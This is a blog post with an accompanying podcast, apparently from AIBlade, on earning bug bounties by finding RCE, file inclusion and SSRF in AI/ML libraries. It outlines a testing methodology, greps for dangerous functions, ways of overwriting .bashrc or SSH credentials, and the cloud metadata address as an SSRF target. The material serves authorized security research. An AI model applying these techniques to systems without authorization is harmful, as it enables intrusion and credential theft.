AIBlade
AIBlade Podcast
AI Bug Bounty Guide 2024
0:00
Current time: 0:00 / Total time: -9:09
-9:09

AI Bug Bounty Guide 2024

A complete guide to earning money by hacking AI platforms in 2024

Bug Bounty has long been an established source of income in the cybersecurity industry. As insecure AI/ML-based applications enter the market in 2024, new bounty programs with low-hanging fruit are opening up.

In this post, I will outline the best bug bounty platform, the top vulnerabilities to search for, and a simple methodology to find your first bug.


Thanks for reading AIBlade! Subscribe for free to receive new posts and support my work.


Contents

The Best Bug Bounty Platform

Top Vulnerabilities

1 - Remote Code Execution

2 - File Inclusion

3 - Server-Side Request Forgery

High-Level Testing Methodology

Final Thoughts - The Future


The Best Bug Bounty Platform

huntr: Participation Guidelines

While HackerOne and BugCrowd are good generic options, the best AI/ML-specific bug bounty platform is Huntr. This platform offers bounties of up to $3000 and has 250+ repositories in scope, allowing researchers to earn a lucrative salary by submitting bugs.

It’s worth noting that Huntr focuses on hacking applications and coding libraries used in AI/ML operations, as opposed to the models themselves. For more information on hacking AI models, check out this blog post,

Top Vulnerabilities

Huntr has identified 3 top vulnerabilities to search for when conducting penetration tests against AI/ML apps. These are all easy to find and have a high severity score, providing a good chance of paying out.

1 - Remote Code Execution

Remote Code Execution tends to be an immediate critical severity vulnerability, allowing an attacker to gain full control over a target server.

Many AI/ML libraries began life as programmatic interfaces, with APIs and web UIs developed later on. These later-developed components are often misconfigured, allowing attackers to directly execute commands through the web UI.

Next, if the app allows users to upload model files, it may insecurely run any code that was injected! This is known as insecure deserialization - you can read my article below to learn more.



2 - File Inclusion

A dramatic landscape depicting a surreal cyber environment. The scene features rolling hills made of circuit boards and computer chips, with streams of binary code flowing like rivers. In the distance, a digital fortress stands atop a mountain, surrounded by a mist of glowing data particles. The sky is filled with swirling, stormy clouds that resemble firewalls, while beams of light resembling data breaches pierce through. The setting is vibrant but slightly ominous, emphasizing the theme of local file inclusion vulnerabilities in AI security.

File Inclusion may sound harmless, but it often leads to remote code execution and critical impact. Local File Inclusion enables attackers to read sensitive data from the web server, and Remote File Inclusion may let them execute malicious code embedded in files.

AI/ML applications need to support both data and model files. These often reside on several filesystem locations when users perform operations. Since there is no standard location for the files, AI/ML developers may give users excessive read/write access, paving the way for devastating exploits.

3 - Server-Side Request Forgery

SSRF is usually less severe than the top 2 vulnerabilities, yet its commonality in AI/ML apps makes it a prime candidate to test for. SSRF can be used to exfiltrate sensitive data, crash the target website, or remotely execute code in specific use cases.

Many AI platforms allow users to upload data in several ways - Amazon S3, HTTP, FTP, and more. Attackers may be able to control where these requests are sent. A common impact is inducing the server to query sensitive internal locations, such as router configuration pages.

High-Level Testing Methodology

A futuristic cityscape with tall skyscrapers and large construction cranes scattered throughout, symbolizing the concept of building and testing frameworks. The skyscrapers are sleek and modern, with reflective glass surfaces, and the cranes are actively working, lifting and positioning structural elements. The sky is a gradient of soft blues and subtle clouds, suggesting early morning or late afternoon. The scene has a dynamic, bustling feel, with a hint of technology in the air, like subtle glowing lights around some buildings, reflecting an AI-driven environment.

You can get started testing AI/ML applications for vulnerabilities right away. The following high-level methodology was summarized from Huntr’s Tutorial page, which provides more detail for each step.

1. Static Code Analysis

  • Download an AI/ML library from GitHub.

  • Run a Snyk vulnerability scan on the library (free VSCode plugin).

  • Review the Snyk scan report.

  • Filter out non-relevant issues, such as XSS where JSON is returned or path traversals that affect non-user-facing utility scripts.

  • Identify the five files with the highest number of findings.

  • Perform a targeted search for dangerous functions and patterns:

    • eval(

    • exec(

    • subprocess.

    • os.system

    • pickle.dumps

    • pickle.loads

    • shell=True

    • yaml.load

2. Map Out The Application

  • Check the /docs directory for an OpenAPI specification.

  • If unavailable, use a tool like ChatGPT to generate an API spec based on documentation.

  • Failing that, populate the application with test data and proxy traffic using a Web App Proxy tool.

  • Save and name each unique API request captured in the proxy.

  • Search for URL patterns such as ftp://, s3://, and http:// in API requests, indicating potential SSRF vulnerabilities.

3. Automatic Testing

  • Perform an active scan on each API request.

  • Monitor each request in a logging tool and document any anomalies, such as unexpected status codes, unusually long responses, or truncated outputs.

4. Manual Testing

  • Inject payloads into each API request using the Big List of Naughty Strings.

  • Use sniper mode on Burp Suite to create multiple insertion points for comprehensive coverage.

  • Analyze all responses, looking for unusual status codes or variations in response length.

5. Authentication Testing

  • Download the Autorize plugin on Burp Suite.

  • Set up Autorize with a low-privilege user’s authentication token.

  • Navigate the application as a high-privilege user and ensure that access controls are properly enforced.

  • Verify that all privileged requests are restricted and logged correctly in the Autorize interface.


What to Look For:

Remote Code Execution

  • Often results from arbitrary file overwrites but can also occur in cases where user input is improperly executed within a command.

  • Review all instances of user input being placed directly into executable operations for vulnerabilities.

File Inclusion

  • Check API calls used for exporting models or datasets from the AI/ML system.

  • Overwriting critical files, such as .bashrc or SSH credentials, can often result in remote code execution.

  • Also check API calls that import or read models and data files, as they are susceptible to local file inclusion.

  • Look for endpoints that use naming conventions like GetArtifact or get-artifact for opportunities to access sensitive files, such as SSH or cloud keys.

Server-Side Request Forgery (SSRF)

  • Target API calls that handle data from S3 buckets or accept URLs as input.

  • Exploit these to initiate internal network requests, potentially exposing services or internal metadata at addresses like http://169.254.169.254/latest/meta-data/.

Final Thoughts - The Future

A serene yet thought-provoking landscape for an AI security blog titled 'Final Thoughts.' The scene is an expansive digital horizon at twilight, where soft pastel hues blend from blue to pink and purple, symbolizing transition and reflection. In the foreground, subtle, abstract lines and circuits fade into the natural landscape, suggesting the integration of technology and nature. Distant mountains in the background are shadowed, and a calm body of water reflects the colors of the sky. The atmosphere feels contemplative, with a touch of mystery and peace.

Data scientists are not developers - they often lack the secure coding experience of professional software engineers. Unfortunately, the apps they develop are often full of high-severity bugs reminiscent of web applications 10+ years ago. There is a fantastic opportunity to make money via AI bug bounty programs right now!

As AI/ML apps and their associated bounties become more mainstream, vulnerabilities will be patched, and the risk of these applications being hacked will reduce. However, the impact of exploitation will increase as more organizations integrate such apps into their infrastructure. Learning about AI Security now will position security professionals to handle challenges like these in the future.


Thanks for reading AIBlade! Subscribe for free to receive new posts and support my work.

Discussion about this episode